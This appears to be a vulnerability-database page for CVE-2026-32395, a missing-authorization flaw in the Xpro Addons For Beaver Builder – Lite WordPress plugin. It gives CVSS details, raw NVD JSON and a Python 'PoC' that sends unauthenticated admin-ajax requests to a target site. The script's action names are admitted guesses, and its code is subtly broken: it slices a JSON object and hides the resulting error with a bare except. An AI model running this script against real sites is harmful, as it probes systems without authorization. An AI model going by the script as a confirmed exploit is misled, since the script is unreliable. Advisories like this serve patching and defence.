Security Vulnerability Report
中文
CVE-2026-32395 CVSS 5.3 MEDIUM

CVE-2026-32395

Published: 2026-03-13 19:54:55
Last Modified: 2026-04-29 10:17:05

Description

Missing Authorization vulnerability in Xpro Xpro Addons For Beaver Builder – Lite xpro-addons-beaver-builder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xpro Addons For Beaver Builder – Lite: from n/a through <= 1.5.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Xpro Addons For Beaver Builder – Lite <= 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32395 PoC - Missing Authorization in Xpro Addons For Beaver Builder - Lite # This PoC demonstrates the missing authorization vulnerability import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-32395 Tests for missing authorization in Xpro Addons plugin """ # List of potentially vulnerable AJAX endpoints # Adjust endpoints based on actual plugin structure vulnerable_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/xpro-addons", ] # Test payload - attempting to access admin-only functionality without authentication test_payloads = [ { "action": "xpro_addons_get_settings", "module": "all" }, { "action": "xpro_addons_export_data", "type": "config" }, { "action": "xpro_addons_get_widgets", "category": "all" } ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE: CVE-2026-32395 - Missing Authorization") print("-" * 60) vulnerable = False for endpoint in vulnerable_endpoints: for payload in test_payloads: try: # Send request without authentication cookies response = requests.post( endpoint, data=payload, timeout=10, allow_redirects=False ) # Check if the response indicates successful unauthorized access # Vulnerable server will return 200 with data instead of 401/403 if response.status_code == 200: try: json_response = response.json() if json_response and "data" in str(json_response).lower(): print(f"[!] Potential vulnerability found!") print(f"[+] Endpoint: {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response: {json_response[:200]}...") vulnerable = True except: pass except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue if vulnerable: print("\n[+] Target appears to be VULNERABLE to CVE-2026-32395") print("[+] Recommendation: Update Xpro Addons For Beaver Builder - Lite to version > 1.5.6") else: print("\n[-] Target does not appear to be vulnerable") print("[*] Note: Manual verification recommended") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32395-poc.py <target_url>") print("Example: python cve-2026-32395-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32395", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:55.113", "lastModified": "2026-04-29T10:17:04.967", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Xpro Xpro Addons For Beaver Builder – Lite xpro-addons-beaver-builder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Xpro Addons For Beaver Builder – Lite: from n/a through <= 1.5.6."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Xpro Xpro Addons For Beaver Builder – Lite xpro-addons-beaver-builder-elementor permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Xpro Addons For Beaver Builder – Lite: desde n/a hasta &lt;= 1.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/xpro-addons-beaver-builder-elementor/vulnerability/wordpress-xpro-addons-for-beaver-builder-lite-plugin-1-5-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}